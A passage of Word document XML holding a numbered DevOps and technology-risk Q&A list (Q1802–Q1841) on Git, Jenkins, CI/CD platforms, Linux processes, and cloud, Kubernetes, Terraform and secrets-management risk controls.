        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1802. What is a Git merge conflict?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A merge conflict happens when Git can't automatically reconcile changes because two branches modified the same lines of a file differently, requiring a human to manually choose or combine the correct result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1803. What is git stash?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: git stash temporarily saves your uncommitted changes (staged and unstaged) onto a stack and reverts your working directory to a clean state, so you can switch branches or pull updates and later reapply those changes with git stash pop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1804. What is the difference between git fetch and git pull?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: git fetch downloads new commits and branches from the remote into your local repository without touching your working directory or current branch; git pull does a fetch and then immediately merges (or rebases) the fetched changes into your current branch - fetch is the safe, look-before-you-merge option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1805. What is git cherry-pick used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: git cherry-pick applies a specific commit from one branch onto another branch without merging the entire branch history, useful for porting a single bug fix to a release branch without pulling in unrelated changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1806. What is git squash?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Squashing combines multiple sequential commits into a single commit (typically via interactive rebase, git rebase -i), used to clean up a messy work-in-progress history into one meaningful commit before merging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1807. What is Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Jenkins is a widely-used open-source, self-hosted automation server for building CI/CD pipelines - it runs builds, tests, and deployments based on triggers (commits, schedules, webhooks), extended through a large plugin ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1808. What is Puppet, and how does it compare to Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Puppet is a configuration management tool that uses a declarative, agent-based, pull model - agents installed on each managed node periodically check in with a central Puppet master and pull their configuration - whereas Ansible is agentless and push-based over SSH; Puppet suits large, stable fleets needing continuous self-correcting enforcement, while Ansible is simpler to start with since there's no agent to install or maintain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1809. What is the difference between HTTP and HTTPS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HTTP transmits data in plain text between client and server; HTTPS is HTTP layered over TLS/SSL, which encrypts that traffic and verifies the server's identity via a certificate, protecting against eavesdropping and man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1810. What is a REST API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A REST API is a web service interface that uses standard HTTP methods (GET, POST, PUT, DELETE) on resource-based URLs to let clients create, read, update, and delete data over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1811. What is YAML used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: YAML is a human-readable data serialization format used to write structured configuration - Kubernetes manifests, Ansible playbooks, CI/CD pipeline definitions - because its indentation-based syntax is easier to read and write than JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1812. What is a cron job?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A cron job is a task scheduled to run automatically at fixed times or intervals, defined using cron's time-based syntax (minute, hour, day, month, weekday) on Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1813. What is SSH?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SSH (Secure Shell) is an encrypted network protocol used to securely log into and execute commands on a remote machine, and is the transport Ansible and most server administration relies on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1814. What is the difference between a process and a thread?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A process is an independently running program with its own isolated memory space; a thread is a lighter-weight unit of execution within a process that shares that process's memory with other threads, making threads cheaper to create but requiring careful synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1815. What is a zombie process, and how do you fix a system that has many of them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A zombie is a process that has already finished executing but still has an entry in the process table (shown as state Z) because its parent hasn't yet called wait() to read its exit status - it holds no real resources beyond that table entry, so one zombie is harmless. A large number of zombies means the parent process has a bug (not reaping its children); the real fix is fixing or restarting that parent process, since you cannot kill a zombie directly (it's already dead) - killing/fixing the parent lets the init/systemd process adopt and reap any orphaned zombies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1816. What is a file descriptor limit (ulimit), and how do you fix a "too many open files" error?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Every open file, socket, or pipe consumes a file descriptor, and Linux caps how many a process can hold open via ulimit - a soft limit (what's actually enforced, raisable by the user up to the hard limit) and a hard limit (the ceiling, raisable only by root). A 'too many open files' error means the process hit its soft limit; fix it by raising the limit in /etc/security/limits.conf, the systemd unit's LimitNOFILE setting, or ulimit -n in the shell - but also check whether the application is leaking file handles/connections instead of closing them, since raising the limit alone just delays the same failure at a higher ceiling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1817. What is CPU throttling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CPU throttling happens when a process's CPU usage is capped - deliberately, by a container CPU limit, or by hardware thermal limits - and it's forced to run slower or is paused once it exceeds its allotted CPU time in a given period.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1818. What is a message queue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A message queue is a middleware component (like Pub/Sub, RabbitMQ, or Kafka) that decouples producers and consumers by buffering messages between them, enabling asynchronous processing and absorbing load spikes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1819. What is caching?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Caching stores frequently accessed data in a faster-to-read location (memory, CDN, local disk) so subsequent requests can be served without recomputing or re-fetching from the slower original source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1820. What is a monolith versus a microservice?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A monolith is a single deployable application containing all functionality in one codebase and process; a microservices architecture splits functionality into many independently deployable services that communicate over the network, trading simplicity for independent scaling and deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1821. What is a typical CI/CD pipeline flow, stage by stage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A typical flow is: checkout source code, install dependencies, run static analysis/lint, run unit tests, build an artifact (binary or container image), run integration tests, push the artifact to a registry, deploy to a staging environment, run smoke/acceptance tests, then promote (often with manual approval) to production, followed by post-deploy verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1822. What is a Jenkins pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Jenkins pipeline is a suite of automated build/test/deploy steps defined as code (in a Jenkinsfile) that Jenkins executes as a single connected workflow, giving you version-controlled, repeatable CI/CD instead of clicking through freestyle job configuration in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1823. What is the difference between a Jenkins declarative pipeline and a scripted pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A declarative pipeline uses a fixed, structured syntax (pipeline { stages { stage { steps { ... } } } }) that's easier to read and validate but less flexible; a scripted pipeline is written in full Groovy inside a node {} block, giving complete programmatic control at the cost of more complexity - declarative is the recommended default for most teams today.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1824. What is a Jenkins agent (node)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An agent (formerly called a 'node' or 'slave') is a machine - physical, VM, or container - that Jenkins connects to and dispatches build work to, letting the controller (master) distribute pipeline execution across multiple workers rather than running everything on one machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1825. What are Jenkins plugins, and can you name a few commonly used ones?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Plugins extend Jenkins with integrations and features beyond its core - common ones include Git/GitHub plugin (source checkout), Pipeline plugin (Jenkinsfile support), Docker plugin (build/run containers), Credentials Binding (secret management), Blue Ocean (pipeline visualization), and Kubernetes plugin (dynamic agent provisioning on a cluster).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1826. What is GitLab CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitLab CI/CD is GitLab's built-in continuous integration and delivery system, where pipelines are defined in a .gitlab-ci.yml file at the repo root and executed by GitLab Runners whenever code is pushed or merged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1827. What is a .gitlab-ci.yml file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The .gitlab-ci.yml file is a YAML file at the root of a GitLab repository that defines the pipeline's stages and jobs - what to run, in what order, on what triggers, and with what scripts - which GitLab automatically picks up and executes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1828. What is a GitLab CI/CD runner?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A GitLab Runner is the agent process that actually executes the jobs defined in .gitlab-ci.yml - it can be shared (GitLab-hosted) or self-hosted, and picks up queued jobs from GitLab and reports results back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1829. What is GitHub Actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitHub Actions is GitHub's native CI/CD and automation platform, where workflows defined in YAML files under .github/workflows/ run in response to repository events (push, pull request, schedule, etc.) on GitHub-hosted or self-hosted runners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1830. What is a GitHub Actions workflow file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A workflow file is a YAML file under .github/workflows/ that defines triggers (on:), jobs, and steps - each step typically either runs a shell command or invokes a reusable 'Action' from the marketplace or another repo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1831. What is a GitHub Actions runner?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A runner is the server (GitHub-hosted or self-hosted) that executes a workflow's jobs - GitHub-hosted runners are ephemeral VMs provisioned per job, while self-hosted runners are your own persistent machines registered to a repo or org.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1832. What is the difference between Jenkins, GitLab CI, and GitHub Actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Jenkins is a self-hosted, plugin-driven automation server that works with any Git provider and needs its own infrastructure to run and maintain; GitLab CI/CD is tightly integrated into GitLab itself (pipeline defined in .gitlab-ci.yml, runs via GitLab Runners); GitHub Actions is GitHub's native equivalent (workflows in .github/workflows/, runs on GitHub-hosted or self-hosted runners) - Jenkins offers the most flexibility and plugin ecosystem, while GitLab CI and GitHub Actions offer simpler setup since they're built into the platform you're already using for source control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Part 3 — Additional Technology Risk Topics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1833. Difference between RTO and RPO.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RTO is Recovery Time Objective, the maximum acceptable time to restore service. RPO is Recovery Point Objective, the maximum acceptable data loss measured in time. For example, an RTO of one hour and RPO of five minutes means restore within one hour and lose no more than five minutes of data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1834. Shared Responsibility Model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The shared responsibility model defines what the cloud provider secures and what the customer must secure. The provider secures underlying infrastructure, while the customer manages configuration, identity, data, network exposure, application security, logging, and compliance. In managed services, responsibilities vary by service type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1835. Risks of public cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Public cloud risks include rapid misconfiguration at scale, internet exposure, complex IAM, data residency issues, vendor dependency, shared responsibility confusion, cost surprises, and inconsistent governance across projects. These can be managed with landing zones, org policies, IAM standards, monitoring, and automated guardrails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1836. IAM best practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use least privilege, avoid basic roles, use groups, prefer service account impersonation over keys, use Workload Identity for GKE, apply IAM Conditions where useful, separate duties, review access regularly, monitor policy changes, and remove unused permissions. Privileged roles should be time-bound and approved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1837. Risks in Kubernetes clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubernetes risks include overprivileged RBAC, privileged containers, exposed API server, insecure images, missing network policies, secret leakage, weak admission controls, noisy multi-tenancy, vulnerable nodes, and insufficient logging. In GKE, I would use Workload Identity, RBAC, private clusters, Binary Authorization, and policy controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1838. Risks of Terraform automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform risks include accidental destructive changes, state file exposure, privilege misuse, drift, poor module design, unreviewed plans, provider bugs, and secrets in variables or state. Controls include remote state encryption, locking, approvals, plan review, policy-as-code, version pinning, and least-privilege CI/CD identities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1839. State file security in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform state can contain sensitive resource data and sometimes secrets. It should be stored in a secure remote backend with encryption, access control, locking, versioning, audit logs, and limited access. Secrets should be kept in secret managers, not hardcoded into Terraform variables or outputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1840. Secrets management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secrets should be stored in managed tools like Secret Manager or Vault, encrypted, access-controlled, rotated, and never printed in logs or committed to code. Workloads should retrieve secrets through secure identity, not static files. CI/CD systems should mask secrets and restrict who can read or update them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1841. Cloud misconfiguration risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common misconfigurations include public buckets, open firewall rules, broad IAM roles, disabled logging, unencrypted data, public databases, unrestricted service accounts, and missing backup policies. I manage them using org policies, posture scanning, IaC checks, alerts, and ownership-based remediation.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>--------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GKE Backup, Restore and etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
